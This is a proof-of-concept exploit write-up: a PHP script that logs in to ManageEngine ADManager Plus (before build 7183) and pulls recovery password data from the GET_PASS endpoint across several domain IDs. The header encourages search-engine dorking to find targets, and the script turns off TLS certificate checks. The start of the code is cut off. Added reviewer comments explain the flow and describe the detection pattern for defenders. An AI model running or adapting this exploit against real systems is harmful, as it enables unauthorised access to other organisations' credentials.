=============================================================================================================================================
| # Title : ManageEngine ADManager 7183 Password Hash Disclosure Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits) |
| # Vendor : https://www.manageengine.com/products/ad-manager/ |
=============================================================================================================================================
POC :
[+] Dorking İn Google Or Other Search Enggine.
[+] ManageEngine ADManager Plus versions prior to build 7183 suffers from a Password Hash disclosure vulnerability..
[+] save code as poc.php .
[+] USage : php poc.php -t -a -u -p
[+] PayLoad :
// NOTE(review): this copy is truncated at this point. The opening PHP tag,
// the signature of getPass(), the curl_init() call that yields $ch and the
// start of the http_build_query() array that yields $data are missing, as
// is the key that belongs to the "false" value below. The call in main()
// shows getPass() takes ($target, $auth, $user, $password).
"false", "j_username" => $user, "j_password" => $password, "domainName" => $auth, "AUTHRULE_NAME" => "ADAuthenticator" ]);
    // Request settings: a form login POST to j_security_check. No separator
    // is inserted between $target and the path.
    $url = $target . 'j_security_check?LogoutFromSSO=true';
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    // Redirects are followed, so $response below is the body of the final
    // page reached after login, not of j_security_check itself.
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
    // TLS validation is disabled for both hostname and chain: the script
    // accepts any certificate the peer presents, including one inserted by
    // an intercepting proxy.
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch, CURLOPT_HTTPHEADER, [
        "User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0",
        "Content-Type: application/x-www-form-urlencoded"
    ]);
    // Send the request.
    $response = curl_exec($ch);
    // Verify authentication.
    $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    // Success is inferred from the literal substring 'Cookie' in the final
    // page body (presumably present on the post-login page — confirm). A
    // transport failure leaves $response === false and falls through to
    // the $http_code branches. The two failure paths exit with different
    // status codes: 0 for a rejected login, 1 for anything else.
    if (strpos($response, 'Cookie') !== false) {
        echo "[+] Authentication successful!\n";
    } elseif ($http_code == 200) {
        echo "[-] Invalid login name/password!\n";
        exit(0);
    } else {
        echo "[-] Something went wrong!\n";
        exit(1);
    }
    // Retrieve the password.
    // The same handle is reused for ConfigureRecoverySettings/GET_PASS with
    // req={"domainId":"<i>"} (URL-encoded) for domainIds 1..5, tried blindly;
    // whether the login session carries over depends on cookie options that
    // are not visible in this copy. CURLOPT_POST is cleared so the follow-up
    // is intended as a GET. For defenders: a request to this endpoint path
    // immediately after a j_security_check login is the observable pattern
    // of this PoC, and the header above names build 7183 as the fixed build.
    for ($i = 1; $i <= 5; $i++) {
        echo "[*] Trying to fetch recovery password for domainId: $i!\n";
        $passUrl = $target . 'ConfigureRecoverySettings/GET_PASS?req=%7B%22domainId%22%3A%22' . $i . '%22%7D';
        curl_setopt($ch, CURLOPT_URL, $passUrl);
        curl_setopt($ch, CURLOPT_POST, false);
        $passResponse = curl_exec($ch);
        // Any truthy body is printed raw; an empty body or a transport
        // failure (false) is silently skipped.
        if ($passResponse) {
            echo $passResponse . "\n";
        }
    }
    curl_close($ch);
}

/**
 * Parse the command line into a target/auth/user/password map.
 *
 * Reads the global $argv. Recognised flags are -t/--target, -a/--auth,
 * -u/--user and -p/--password; each consumes the argument that follows it.
 * Unrecognised arguments are ignored. A flag given as the very last
 * argument indexes past the end of $argv ($argv[++$i]), which yields null
 * with an undefined-key warning rather than an error.
 *
 * @return array<string, string|null> keys target, auth, user, password
 */
function get_args()
{
    global $argv;
    $args = [
        'target' => '',
        'auth' => '',
        'user' => '',
        'password' => ''
    ];
    for ($i = 1; $i < count($argv); $i++) {
        switch ($argv[$i]) {
            case '-t':
            case '--target':
                $args['target'] = $argv[++$i];
                break;
            case '-a':
            case '--auth':
                $args['auth'] = $argv[++$i];
                break;
            case '-u':
            case '--user':
                $args['user'] = $argv[++$i];
                break;
            case '-p':
            case '--password':
                $args['password'] = $argv[++$i];
                break;
        }
    }
    return $args;
}

/**
 * Entry point: require all four options, then hand them to getPass().
 *
 * The presence check is a truthiness test, so a value of "0" counts as
 * missing. On a missing option it prints the usage line (which names
 * exploit.php, whereas the header above says to save the file as poc.php)
 * and exits with status 1.
 */
function main()
{
    $args = get_args();
    if (!$args['target'] || !$args['auth'] || !$args['user'] || !$args['password']) {
        echo "Usage: php exploit.php -t -a -u -p \n";
        exit(1);
    }
    getPass($args['target'], $args['auth'], $args['user'], $args['password']);
}

main();
// Everything after the closing tag below is emitted verbatim by the
// interpreter when the script runs.
?>
Greetings to :===================================================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================